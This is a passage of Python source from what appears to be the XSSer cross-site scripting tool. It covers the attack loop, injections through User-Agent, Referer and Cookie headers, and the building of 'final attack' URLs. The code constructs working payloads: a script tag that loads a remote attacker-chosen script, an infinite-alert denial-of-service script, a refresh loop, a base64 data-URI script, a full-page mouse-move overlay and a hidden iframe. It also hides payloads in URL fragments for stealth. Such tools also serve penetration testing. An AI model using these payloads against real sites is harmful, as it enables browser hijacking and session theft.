  2712.             reporter.report_state('locking targets')
    2713. 

  2713. 

  2714.         # step 3: get query string
    2715. 

  2715.         query_string = self.try_running(self.get_query_string, "\n[Error] Internal problems getting query -string-\n")
    2716. 

  2716.         for reporter in self._reporters:
    2717. 

  2717.             reporter.report_state('sanitize')
    2718. 

  2718.         urls = self.sanitize_urls(urls)
    2719. 

  2719.         for reporter in self._reporters:
    2720. 

  2720.             reporter.report_state('attack')
    2721. 

  2721. 

  2722.         # step 4: perform attack
    2723. 

  2723.         self.try_running(self.attack, "\n[Error] Internal problems running attack...\n", (urls, payloads, query_string))
    2724. 

  2724.         for reporter in self._reporters:
    2725. 

  2725.             reporter.report_state('reporting')
    2726. 

  2726.         if len(self.final_attacks):
    2727. 

  2727.             self.report("[Info] Waiting for tokens to arrive...")
    2728. 

  2728.         while self._ongoing_requests and not self._landing:
    2729. 

  2729.             if not self.pool:
    2730. 

  2730.                 self.mothership.poll_workers()
    2731. 

  2731.             else:
    2732. 

  2732.                 self.poll_workers()
    2733. 

  2733.             time.sleep(0.2)
    2734. 

  2734.             for reporter in self._reporters:
    2735. 

  2735.                 reporter.report_state('final sweep...')
    2736. 

  2736.         if self.pool:
    2737. 

  2737.             self.pool.dismissWorkers(len(self.pool.workers))
    2738. 

  2738.             self.pool.joinAllDismissedWorkers()
    2739. 

  2739.         start = time.time()
    2740. 

  2740.         while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
    2741. 

  2741.             time.sleep(0.2)
    2742. 

  2742.             for reporter in self._reporters:
    2743. 

  2743.                 reporter.report_state('landing... '+str(int(5.0 - (time.time() - start))))
    2744. 

  2744.         if self.final_attacks:
    2745. 

  2745.             self.report("-"*25+"\n")
    2746. 

  2746.             self.report("[Info] Generating 'token' url:\n")
    2747. 

  2747.             for final_attack in self.final_attacks.values():
    2748. 

  2748.                 if not final_attack['url'] == None:
    2749. 

  2749.                     self.report(final_attack['url'] , "\n")
    2750. 

  2750.                 self.report("="*50+"\n")
    2751. 

  2751.                 self.report("[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)\n")
    2752. 

  2752.                 self.report(",".join(self.successful_urls), "\n")
    2753. 

  2753.                 self.report("="*50 + "\n")
    2754. 

  2754.         for reporter in self._reporters:
    2755. 

  2755.             reporter.end_attack()
    2756. 

  2756.         self.report("="*50)
    2757. 

  2757.         if self.mothership:
    2758. 

  2758.             self.mothership.remove_reporter(self)
    2759. 

  2759.             self.report("Mosquito(es) landed!")
    2760. 

  2760.         else:
    2761. 

  2761.             self.report("Mosquito(es) landed!")
    2762. 

  2762.         self.report("="*50)
    2763. 

  2763.         self.print_results()
    2764. 

  2764. 

  2765.     def sanitize_urls(self, urls):
    2766. 

  2766.         all_urls = set()
    2767. 

  2767.         if urls is not None:
    2768. 

  2768.             for url in urls:
    2769. 

  2769.                 if url.startswith("http://") or url.startswith("https://"):
    2770. 

  2770.                     self.urlspoll.append(url)
    2771. 

  2771.                     all_urls.add(url)
    2772. 

  2772.                 else:
    2773. 

  2773.                     if self.options.crawling:
    2774. 

  2774.                         self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
    2775. 

  2775.                     else:
    2776. 

  2776.                         self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
    2777. 

  2777.                     url = None
    2778. 

  2778.         else:
    2779. 

  2779.             self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n")
    2780. 

  2780.         return all_urls
    2781. 

  2781. 

  2782.     def land(self, join=False):
    2783. 

  2783.         self._landing = True
    2784. 

  2784.         if self.hub:
    2785. 

  2785.             self.hub.shutdown()
    2786. 

  2786.             if join:
    2787. 

  2787.                 self.hub.join()
    2788. 

  2788.                 self.hub = None
    2789. 

  2789. 

  2790.     def _prepare_extra_attacks(self, payload):
    2791. 

  2791.         """
    2792. 

  2792.         Setup extra attacks.
    2793. 

  2793.         """
    2794. 

  2794.         options = self.options
    2795. 

  2795.         agents = [] # user-agents
    2796. 

  2796.         try:
    2797. 

  2797.             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    2798. 

  2798.         except:
    2799. 

  2799.             f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    2800. 

  2800.         for line in f:
    2801. 

  2801.             agents.append(line)
    2802. 

  2802.         extra_agent = random.choice(agents).strip() # set random user-agent
    2803. 

  2803.         extra_referer = "127.0.0.1"
    2804. 

  2804.         extra_cookie = None
    2805. 

  2805.         if self.options.script:
    2806. 

  2806.             if 'XSS' in payload['payload']:
    2807. 

  2807.                 payload['payload'] = payload['payload'].replace("XSS","PAYLOAD")
    2808. 

  2808.         if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']:
    2809. 

  2809.             if options.xsa:
    2810. 

  2810.                 hashing = self.generate_hash('xsa')
    2811. 

  2811.                 agent = payload['payload'].replace('PAYLOAD', hashing)
    2812. 

  2812.                 self._ongoing_attacks['xsa'] = hashing
    2813. 

  2813.                 self.xsa_injection = self.xsa_injection + 1
    2814. 

  2814.                 self.options.agent = agent
    2815. 

  2815.                 extra_agent = agent
    2816. 

  2816.                 self.extra_hashed_injections[hashing] = "XSA", payload['payload']
    2817. 

  2817.             if options.xsr:
    2818. 

  2818.                 hashing = self.generate_hash('xsr')
    2819. 

  2819.                 referer = payload['payload'].replace('PAYLOAD', hashing)
    2820. 

  2820.                 self._ongoing_attacks['xsr'] = hashing
    2821. 

  2821.                 self.xsr_injection = self.xsr_injection + 1
    2822. 

  2822.                 self.options.referer = referer
    2823. 

  2823.                 extra_referer = referer
    2824. 

  2824.                 self.extra_hashed_injections[hashing] = "XSR", payload['payload']
    2825. 

  2825.             if options.coo:
    2826. 

  2826.                 hashing = self.generate_hash('cookie')
    2827. 

  2827.                 cookie = payload['payload'].replace('PAYLOAD', hashing)
    2828. 

  2828.                 self._ongoing_attacks['coo'] = hashing
    2829. 

  2829.                 self.coo_injection = self.coo_injection + 1
    2830. 

  2830.                 self.options.cookie = cookie
    2831. 

  2831.                 extra_cookie = cookie
    2832. 

  2832.                 self.extra_hashed_injections[hashing] = "COO", payload['payload']
    2833. 

  2833.         return extra_agent, extra_referer, extra_cookie
    2834. 

  2834. 

  2835.     def attack(self, urls, payloads, query_string):
    2836. 

  2836.         """
    2837. 

  2837.         Perform an attack on the given urls with the provided payloads and
    2838. 

  2838.         query_string.
    2839. 

  2839.         """
    2840. 

  2840.         for url in urls:
    2841. 

  2841.             if self.pool:
    2842. 

  2842.                 self.poll_workers()
    2843. 

  2843.             else:
    2844. 

  2844.                 self.mothership.poll_workers()
    2845. 

  2845.             if not self._landing:
    2846. 

  2846.                 self.attack_url(url, payloads, query_string)
    2847. 

  2847. 

  2848.     def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
    2849. 

  2849.         """
    2850. 

  2850.         Generate a real attack url by using data from a successful test.
    2851. 

  2851. 

  2852. 	    This method also applies DOM stealth mechanisms.
    2853. 

  2853.         """
    2854. 

  2854.         user_attack_payload = payload['payload']
    2855. 

  2855.         if self.options.finalpayload:
    2856. 

  2856.             user_attack_payload = self.options.finalpayload
    2857. 

  2857.         elif self.options.finalremote:
    2858. 

  2858.             user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
    2859. 

  2859.         elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
    2860. 

  2860.             user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
    2861. 

  2861.         elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
    2862. 

  2862.             user_attack_payload = self.options.finalpayload
    2863. 

  2863.         if self.options.dos:
    2864. 

  2864.             user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
    2865. 

  2865.         if self.options.doss:
    2866. 

  2866.             user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
    2867. 

  2867.         if self.options.b64:
    2868. 

  2868.             user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
    2869. 

  2869.         if self.options.onm:
    2870. 

  2870.             user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
    2871. 

  2871.         if self.options.ifr:
    2872. 

  2872.             user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
    2873. 

  2873.         do_anchor_payload = self.options.anchor
    2874. 

  2874.         anchor_data = None
    2875. 

  2875.         attack_hash = None
    2876. 

  2876.         if do_anchor_payload: # DOM Shadows!
    2877. 

  2877.             dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
    2878. 

  2878.             dest_url = dest_url.replace('?', '#')
    2879. 

  2879.         else:
    2880. 

  2880.             dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
    2881. 

  2881.         if attack_hash:
    2882. 

  2882.             self.final_attacks[attack_hash] = {'url':dest_url}
    2883. 

  2883.         return dest_url
    2884. 

  2884. 

  2885.     def token_arrived(self, attack_hash):
    2886. 

  2886.         if not self.mothership:
    2887. 

  2887.             # only the mothership calls on token arriving.
    2888. 

  2888.             self.final_attack_callback(attack_hash)
    2889. 

  2889. 

  2890.     def final_attack_callback(self, attack_hash):
    2891. 

  2891.         if attack_hash in self.final_attacks:
    2892. 

  2892.             dest_url = self.final_attacks[attack_hash]['url']
    2893. 

  2893.             self.report('[*] Browser check:', dest_url)
    2894. 

  2894.             for reporter in self._reporters:
    2895. 

  2895.                 reporter.add_checked(dest_url)
    2896. 

  2896.             if self._reporter:
    2897. 

  2897.                 from twisted.internet import reactor
    2898. 

  2898.                 reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
    2899. 

  2899.             self.final_attacks.pop(attack_hash)
    2900. 

  2900. 

  2901.     def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
    2902. 

  2902.         real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
    2903. 

  2903.         #generate_shorturls = self.options.shorturls
    2904. 

  2904.         #if generate_shorturls:
    2905. 

  2905.         #    shortener = ShortURLReservations(self.options.shorturls)
    2906. 

  2906.         #    if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
    2907. 

  2907.         #        shorturl = shortener.process_url(real_attack_url)
    2908. 

  2908.         #        self.report("[/] Shortered URL (Final Attack):", shorturl)
    2909. 

  2909.         #    else:
    2910. 

  2910.         #        shorturl = shortener.process_url(dest_url)
    2911. 

  2911.         #        self.report("[/] Shortered URL (Injection):", shorturl)
    2912. 

  2912.         return real_attack_url
    2913. 

  2913. 

  2914.     def report(self, *args):
    2915. 

  2915.         args = list([str(s) for s in args])
    2916. 

  2916.         formatted = " ".join(args)
    2917. 

  2917.         if not self.options.silent:
    2918. 

  2918.             print(formatted)
    2919. 

  2919.         for reporter in self._reporters:
    2920. 

  2920.             reporter.post(formatted)
    2921. 

  2921. 

  2922.     def print_results(self):
    2923. 

  2923.         """
    2924. 

  2924.         Print results from attack.
    2925. 

  2925.         """
    2926. 

  2926.         self.report('\n' + '='*75)
    2927. 

  2927.         total_injections = len(self.hash_found) + len(self.hash_notfound)
    2928. 

  2928.         if len(self.hash_found) + len(self.hash_notfound) == 0:
    2929. 

  2929.             pass
    2930. 

  2930.         elif self.options.heuristic: 
    2931. 

  2931.             pass
    2932. 

  2932.         else:
    2933. 

  2933.             self.report("[*] Final Results:")
    2934. 

  2934.             self.report('='*75 + '\n')
    2935. 

  2935.             self.report("- Injections:", total_injections)
    2936. 

  2936.             self.report("- Failed:", len(self.hash_notfound))
    2937. 

  2937.             self.report("- Successful:", len(self.hash_found))
    2938. 

  2938.             try:
    2939. 

  2939.                 _accur = len(self.hash_found) * 100 / total_injections
    2940. 

  2940.             except ZeroDivisionError:
    2941. 

  2941.                 _accur = 0
    2942. 

  2942.             self.report("- Accur: %s %%\n" % _accur)
    2943. 

  2943.             if not len(self.hash_found) and self.hash_notfound:
    2944. 

  2944.                 self.report('='*75 + '\n')
    2945. 

  2945.                 pass
    2946. 

  2946.             else:
    2947. 

  2947.                 self.report('='*75)
    2948. 

  2948.                 self.report("[*] List of XSS injections:")
    2949. 

  2949.                 self.report('='*75 + '\n')
    2950. 

  2950.                 if self.options.reversecheck:
    2951. 

  2951.                     self.report("You have found: [ " + str(len(self.hash_found)) + " ] XSS vector(s)! -> [100% VULNERABLE]\n")
    2952. 

  2952.                 else:
    2953. 

  2953.                     self.report("You have found: [ " + str(len(self.hash_found)) + " ] possible (without --reverse-check) XSS vector(s)!\n")
    2954. 

  2954.                 self.report("---------------------" + "\n")
    2955. 

  2955.         if self.options.fileoutput:
    2956. 

  2956.             fout = open("XSSreport.raw", "w") # write better than append
    2957. 

  2957.         for line in self.hash_found:
    2958. 

  2958.             if self.options.heuristic or self.options.hash: # not final attack possible when checking
    2959. 

  2959.                 pass
    2960. 

  2960.             else:
    2961. 

  2961.                 attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
    2962. 

  2962.             if line[2] == "XSR":
    2963. 

  2963.                 self.xsr_found = self.xsr_found + 1
    2964. 

  2964.                 if len(self.hash_found) < 11:
    2965. 

  2965.                     if line[4]: # when query string
    2966. 

  2966.                         self.report("[+] Target:", line[6] + " | " + line[4])
    2967. 

  2967.                     else:
    2968. 

  2968.                         self.report("[+] Target:", line[6])
    2969. 

  2969.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    2970. 

  2970.                     self.report("[!] Method: Referer Injection")
    2971. 

  2971.                     self.report("[*] Hash:", line[3])
    2972. 

  2972.                     self.report("[*] Payload:", str(Curl.referer))
    2973. 

  2973.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    2974. 

  2974.                 if self.options.fileoutput:
    2975. 

  2975.                     fout.write("="*75)
    2976. 

  2976.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    2977. 

  2977.                     fout.write("="*75 + "\n\n")
    2978. 

  2978.                     for h in self.hash_found:
    2979. 

  2979.                         if h[2] == "XSR":
    2980. 

  2980.                             if h[4]:
    2981. 

  2981.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
    2982. 

  2982.                             else:
    2983. 

  2983.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    2984. 

  2984.                         fout.write("="*75 + "\n\n")
    2985. 

  2985.             elif line[2] == "XSA":
    2986. 

  2986.                 self.xsa_found = self.xsa_found + 1
    2987. 

  2987.                 if len(self.hash_found) < 11:
    2988. 

  2988.                     if line[4]: # when query string
    2989. 

  2989.                         self.report("[+] Target:", line[6] + " | " + line[4])
    2990. 

  2990.                     else:
    2991. 

  2991.                         self.report("[+] Target:", line[6])
    2992. 

  2992.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    2993. 

  2993.                     self.report("[!] Method: User-Agent Injection")
    2994. 

  2994.                     self.report("[*] Hash:", line[3])
    2995. 

  2995.                     self.report("[*] Payload:", str(Curl.agent))
    2996. 

  2996.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    2997. 

  2997.                 if self.options.fileoutput:
    2998. 

  2998.                     fout.write("="*75)
    2999. 

  2999.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3000. 

  3000.                     fout.write("="*75 + "\n\n")
    3001. 

  3001.                     for h in self.hash_found:
    3002. 

  3002.                         if h[2] == "XSA":
    3003. 

  3003.                             if h[4]:
    3004. 

  3004.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3005. 

  3005.                             else:
    3006. 

  3006.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3007. 

  3007.                         fout.write("="*75 + "\n\n")
    3008. 

  3008.             elif line[2] == "COO":
    3009. 

  3009.                 self.coo_found = self.coo_found + 1
    3010. 

  3010.                 if len(self.hash_found) < 11:
    3011. 

  3011.                     if line[4]: # when query string
    3012. 

  3012.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3013. 

  3013.                     else:
    3014. 

  3014.                         self.report("[+] Target:", line[6])
    3015. 

  3015.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3016. 

  3016.                     self.report("[!] Method: Cookie Injection")
    3017. 

  3017.                     self.report("[*] Hash:", line[3])
    3018. 

  3018.                     self.report("[*] Payload:", str(Curl.cookie))
    3019. 

  3019.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3020. 

  3020.                 if self.options.fileoutput:
    3021. 

  3021.                     fout.write("="*75)
    3022. 

  3022.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3023. 

  3023.                     fout.write("="*75 + "\n\n")
    3024. 

  3024.                     for h in self.hash_found:
    3025. 

  3025.                         if h[2] == "COO":
    3026. 

  3026.                             if h[4]:
    3027. 

  3027.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3028. 

  3028.                             else:
    3029. 

  3029.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3030. 

  3030.                         fout.write("="*75 + "\n\n")
    3031. 

  3031.             elif line[1] == "[Data Control Protocol Injection]":
    3032. 

  3032.                 self.dcp_found = self.dcp_found + 1
    3033. 

  3033.                 if len(self.hash_found) < 11:
    3034. 

  3034.                     if line[4]: # when query string
    3035. 

  3035.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3036. 

  3036.                     else:
    3037. 

  3037.                         self.report("[+] Target:", line[6])
    3038. 

  3038.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3039. 

  3039.                     self.report("[!] Method: DCP")
    3040. 

  3040.                     self.report("[*] Hash:", line[3])
    3041. 

  3041.                     self.report("[*] Payload:", line[0])
    3042. 

  3042.                     self.report("[!] Vulnerable: DCP (Data Control Protocol)")
    3043. 

  3043.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3044. 

  3044.                         self.report("[*] Final Attack:", attack_url)
    3045. 

  3045.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3046. 

  3046.                 if self.options.fileoutput:
    3047. 

  3047.                     fout.write("="*75)
    3048. 

  3048.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3049. 

  3049.                     fout.write("="*75 + "\n\n")
    3050. 

  3050.                     for h in self.hash_found:
    3051. 

  3051.                         if h[4]:
    3052. 

  3052.                             if h[1] == "[Data Control Protocol Injection]":
    3053. 

  3053.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3054. 

  3054.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3055. 

  3055.                                 else:
    3056. 

  3056.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3057. 

  3057.                             else:
    3058. 

  3058.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3059. 

  3059.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3060. 

  3060.                                 else:
    3061. 

  3061.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3062. 

  3062.                         fout.write("="*75 + "\n\n")
    3063. 

  3063.             elif line[1] == "[Document Object Model Injection]":
    3064. 

  3064.                 self.dom_found = self.dom_found + 1 
    3065. 

  3065.                 if len(self.hash_found) < 11:
    3066. 

  3066.                     if line[4]: # when query string
    3067. 

  3067.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3068. 

  3068.                     else:
    3069. 

  3069.                         self.report("[+] Target:", line[6])
    3070. 

  3070.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3071. 

  3071.                     self.report("[!] Method: DOM")
    3072. 

  3072.                     self.report("[*] Hash:", line[3])
    3073. 

  3073.                     self.report("[*] Payload:", line[0])
    3074. 

  3074.                     self.report("[!] Vulnerable: DOM (Document Object Model)")
    3075. 

  3075.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3076. 

  3076.                         self.report("[*] Final Attack:", attack_url)
    3077. 

  3077.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3078. 

  3078.                 if self.options.fileoutput:
    3079. 

  3079.                     fout.write("="*75)
    3080. 

  3080.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3081. 

  3081.                     fout.write("="*75 + "\n\n")
    3082. 

  3082.                     for h in self.hash_found:
    3083. 

  3083.                         if h[1] == "[Document Object Model Injection]":
    3084. 

  3084.                             if h[4]:
    3085. 

  3085.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3086. 

  3086.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3087. 

  3087.                                 else:
    3088. 

  3088.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3089. 

  3089.                             else:
    3090. 

  3090.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3091. 

  3091.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3092. 

  3092.                                 else:
    3093. 

  3093.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3094. 

  3094.                             fout.write("="*75 + "\n\n")
    3095. 

  3095.             elif line[1] == "[Induced Injection]":
    3096. 

  3096.                 self.httpsr_found = self.httpsr_found +1
    3097. 

  3097.                 if len(self.hash_found) < 11:
    3098. 

  3098.                     if line[4]: # when query string
    3099. 

  3099.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3100. 

  3100.                     else:
    3101. 

  3101.                         self.report("[+] Target:", line[6])
    3102. 

  3102.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3103. 

  3103.                     self.report("[!] Method: INDUCED")
    3104. 

  3104.                     self.report("[*] Hash:", line[3])
    3105. 

  3105.                     self.report("[*] Payload:", line[0])
    3106. 

  3106.                     self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)")
    3107. 

  3107.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3108. 

  3108.                         self.report("[*] Final Attack:", attack_url)
    3109. 

  3109.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3110. 

  3110.                 if self.options.fileoutput:
    3111. 

  3111.                     fout.write("="*75)
    3112. 

  3112.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3113. 

  3113.                     fout.write("="*75 + "\n\n")
    3114. 

  3114.                     for h in self.hash_found:
    3115. 

  3115.                         if h[4]:
    3116. 

  3116.                             if h[1] == "[Induced Injection]":
    3117. 

  3117.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3118. 

  3118.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3119. 

  3119.                                 else:
    3120. 

  3120.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3121. 

  3121.                             else:
    3122. 

  3122.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3123. 

  3123.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3124. 

  3124.                                 else:
    3125. 

  3125.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3126. 

  3126.                             fout.write("="*75 + "\n\n")
    3127. 

  3127.             elif line[1] == "[hashing check]":
    3128. 

  3128.                 if len(self.hash_found) < 11:
    3129. 

  3129.                     if line[4]:
    3130. 

  3130.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3131. 

  3131.                     else:
    3132. 

  3132.                         self.report("[+] Target:", line[6])
    3133. 

  3133.                     self.report("[+] Vector: [ " + str(line[3]) + " ]")
    3134. 

  3134.                     self.report("[!] Method:", line[2])
    3135. 

  3135.                     self.report("[*] Payload:", line[5])
    3136. 

  3136.                     self.report("[!] Status: HASH FOUND!",  "\n", '-'*50, "\n")
    3137. 

  3137.                 if self.options.fileoutput:
    3138. 

  3138.                     fout.write("="*75)
    3139. 

  3139.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3140. 

  3140.                     fout.write("="*75 + "\n\n")
    3141. 

  3141.                     for h in self.hash_found:
    3142. 

  3142.                         if h[1] == "[hashing check]":
    3143. 

  3143.                             if h[4]:
    3144. 

